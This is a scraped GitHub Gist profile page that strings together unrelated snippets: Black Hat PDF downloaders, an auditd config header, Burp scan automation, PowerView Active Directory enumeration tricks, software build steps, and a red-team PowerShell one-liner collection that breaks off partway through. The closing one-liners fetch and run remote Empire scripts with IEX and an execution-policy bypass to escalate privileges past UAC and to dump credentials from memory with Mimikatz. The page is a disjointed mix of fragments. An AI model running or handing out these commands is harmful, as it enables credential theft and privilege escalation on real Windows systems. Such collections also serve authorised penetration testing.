Skip to content

Instantly share code, notes, and snippets.

View jivoi's full-sized avatar
:electron:
living off the land!

EK_ jivoi

:electron:
living off the land!
View GitHub Profile
@jivoi
jivoi / bhpdfdown.sh
Created July 28, 2017 08:08
Download BH PDFs
#!/bin/bash
curl -s https://www.blackhat.com/us-17/briefings.html | egrep 'https://www.blackhat.com/docs/us-17/.*\.pdf' | awk -F '"' '{ print $4 }' | while read URL;
do
F=$(basename $URL)
if [ ! -r $F ]; then
curl -s -o $F $URL
echo "Scrapped $f"
fi
done
@jivoi
jivoi / bh-downloader.py
Created July 28, 2017 15:28
Black Hat brifiengs document downloader script
# -*- coding: utf-8 -*-
import requests
import os
from time import time as timer
from bs4 import BeautifulSoup
from multiprocessing.dummy import Pool as ThreadPool
# import for "'ascii' codec can't decode byte" error
import sys
@jivoi
jivoi / audit.rules
Created January 23, 2018 14:24 — forked from Neo23x0/audit.rules
Linux Auditd Best Practice Configuration
# ___ ___ __ __
# / | __ ______/ (_) /_____/ /
# / /| |/ / / / __ / / __/ __ /
# / ___ / /_/ / /_/ / / /_/ /_/ /
# /_/ |_\__,_/\__,_/_/\__/\__,_/
#
# Linux Audit Daemon - Best Practice Configuration
# /etc/audit/audit.rules
#
# Compiled by Florian Roth
@jivoi
jivoi / autoburp.sh
Created March 9, 2018 08:45 — forked from jgamblin/autoburp.sh
Automatic Burp Script With Slack Reporting.
#!/bin/sh
java -jar -Xmx2g -Djava.awt.headless=true ~/BurpSuitePro/burpsuite_pro.jar http jerrygamblin.com 80
cp *.html ~/BurpSuitePro/scan.html
wkhtmltopdf scan.html scan.pdf
curl -F file=@scan.pdf -F initial_comment="BurpProxy JerryGamblin.com Scan" -F channels=#burpreports -F token=(Your Token) https://slack.com/api/files.upload
rm *.html
rm *.pdf
@jivoi
jivoi / burpsettings.json
Created March 9, 2018 08:47 — forked from jgamblin/burpsettings.json
Burp Settings JSON
{
"project_options":{
"connections":{
"hostname_resolution":[],
"out_of_scope_requests":{
"drop_all_out_of_scope":false,
"exclude":[
{
"enabled":true,
"file":"logout",
@jivoi
jivoi / PowerView-2.0-tricks.ps1
Created March 10, 2018 16:23 — forked from HarmJ0y/PowerView-2.0-tricks.ps1
PowerView-2.0 tips and tricks
# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse
# get the effective set of users who can administer a server
sudo apt-get install checkinstall build-essential automake autoconf libtool pkg-config libcurl4-openssl-dev intltool libxml2-dev libgtk2.0-dev libnotify-dev libglib2.0-dev libevent-dev
wget https://www.inet.no/dante/files/dante-1.4.2.tar.gz
./configure
make
sudo checkinstall
sudo dpkg -i dante_1.4.2-1_amd64.deb
# /etc/sockd.conf
# logoutput: syslog

Minimal i3 Ubuntu 18.04

TL,DR

A fully fonctional and good-looking linux for less than 256mb of ram

Setting Up

Downloading and installing

Get the "mini.iso" image from archive.ubuntu.com

Legacy boot

Just flash an usb drive with it as follow.

sudo dd bs=4M if=mini.iso of=/dev/sd&gt; conv=fdatasync &amp;&amp; sync
sudo apt-get install checkinstall build-essential automake autoconf libtool pkg-config libcurl4-openssl-dev intltool libxml2-dev libgtk2.0-dev libnotify-dev libglib2.0-dev libevent-dev
wget https://curl.haxx.se/download/curl-7.60.0.tar.gz
tar xzf curl-7.60.0.tar.gz
./buildconf
./configure
checkinstall
dpkg -i /root/curl/curl-7.60.0/curl_7.60.0-1_amd64.deb
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands